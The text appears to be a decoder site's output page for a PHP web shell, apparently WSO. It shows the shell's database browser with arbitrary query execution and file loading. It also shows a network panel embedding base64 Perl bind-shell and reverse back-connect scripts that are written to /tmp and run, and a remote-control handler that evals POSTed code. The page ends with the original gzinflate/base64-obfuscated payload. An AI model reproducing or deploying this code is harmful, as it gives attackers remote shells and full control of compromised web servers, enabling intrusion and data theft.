$n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));
$value = htmlspecialchars($value);
echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'> <a href=# onclick=\"st(\'".$value."\')\">".$value."</a> (".$n[\'n\'].")</nobr><br>";
}
echo "<input type=\'checkbox\' onclick=\'is();\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\"download\";document.sf.submit();\'></td><td style=\'border-top:2px solid #666;\'>";
if(@$_POST[\'p1\'] == \'select\') {
$_POST[\'p1\'] = \'query\';
$db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');
$num = $db->fetch();
$num = $num[\'n\'];
echo "<span>".$_POST[\'p2\']."</span> ($num) ";
for($i=0;$i<($num/30);$i++)
if($i != (int)$_POST[\'p3\'])
echo "<a href=\'#\' onclick=\'st(\"".$_POST[\'p2\']."\", $i)\'>",($i+1),"</a> ";
else
echo ($i+1)," ";
if($_POST[\'type\']==\'pgsql\')
$_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);
else
$_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';
echo "<br><br>";
}
if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) {
$db->query(@$_POST[\'p3\']);
if($db->res !== false) {
$title = false;
echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';
$line = 1;
while($item = $db->fetch()) {
if(!$title) {
echo \'<tr>\';
foreach($item as $key => $value)
echo \'<th>\'.$key.\'</th>\';
reset($item);
$title=true;
echo \'</tr><tr>\';
$line = 2;
}
echo \'<tr class="l\'.$line.\'">\';
$line = $line==1?2:1;
foreach($item as $key => $value) {
if($value == null)
echo \'<td><i>null</i></td>\';
else
echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';
}
echo \'</tr>\';
}
echo \'</table>\';
} else {
echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';
}
}
echo "<br><textarea name=\'p3\' style=\'width:100%;height:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";
echo "</td></tr>";
}
echo "</table></form><br/><form onsubmit=\'document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";
if(@$_POST[\'p1\'] == \'loadfile\') {
$file = $db->loadFile($_POST[\'p2\']);
echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';
}
}
echo \'</div>\';
wsoFooter();
}
function actionNetwork() {
wsoHeader();
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
echo "<h1>Network tools</h1><div class=content>
<form name=\'nfp\' onSubmit=\"g(null,null,\'bpp\',this.port.value);return false;\">
<span>Bind port to /bin/sh [perl]</span><br/>
Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>
</form>
<form name=\'nfp\' onSubmit=\"g(null,null,\'bcp\',this.server.value,this.port.value);return false;\">
<span>Back-connect [perl]</span><br/>
Server: <input type=\'text\' name=\'server\' value=\'". $_SERVER[\'REMOTE_ADDR\'] ."\'> Port: <input type=\'text\' name=\'port\' value=\'31337\'> <input type=submit value=\'>>\'>
</form><br>";
if(isset($_POST[\'p1\'])) {
function cf($f,$t) {
$w=@fopen($f,"w") or @function_exists(\'file_put_contents\');
if($w) {
@fwrite($w,@base64_decode($t));
@fclose($w);
}
}
if($_POST[\'p1\'] == \'bpp\') {
cf("/tmp/bp.pl",$bind_port_p);
$out = wsoEx("perl /tmp/bp.pl ".$_POST[\'p2\']." 1>/dev/null 2>&1 &");
echo "<pre class=ml1>$out
".wsoEx("ps aux | grep bp.pl")."</pre>";
}
if($_POST[\'p1\'] == \'bcp\') {
cf("/tmp/bc.pl",$back_connect_p);
$out = wsoEx("perl /tmp/bc.pl ".$_POST[\'p2\']." ".$_POST[\'p3\']." 1>/dev/null 2>&1 &");
echo "<pre class=ml1>$out
".wsoEx("ps aux | grep bc.pl")."</pre>";
}
}
echo \'</div>\';
wsoFooter();
}
function actionRC() {
if(!@$_POST[\'p1\']) {
$a = array(
"uname" => php_uname(),
"php_version" => phpversion(),
"wso_version" => VERSION,
"safemode" => @ini_get(\'safe_mode\')
);
echo serialize($a);
} else {
eval($_POST[\'p1\']);
}
}
if( empty($_POST[\'a\']) )
if(isset($default_action) && function_exists(\'action\' . $default_action))
$_POST[\'a\'] = $default_action;
else
$_POST[\'a\'] = \'SecInfo\';
if( !empty($_POST[\'a\']) && function_exists(\'action\' . $_POST[\'a\']) )
call_user_func(\'action\' . $_POST[\'a\']);
exit;'
Did this file decode correctly?
Original Code
echo(gzinflate(base64_decode('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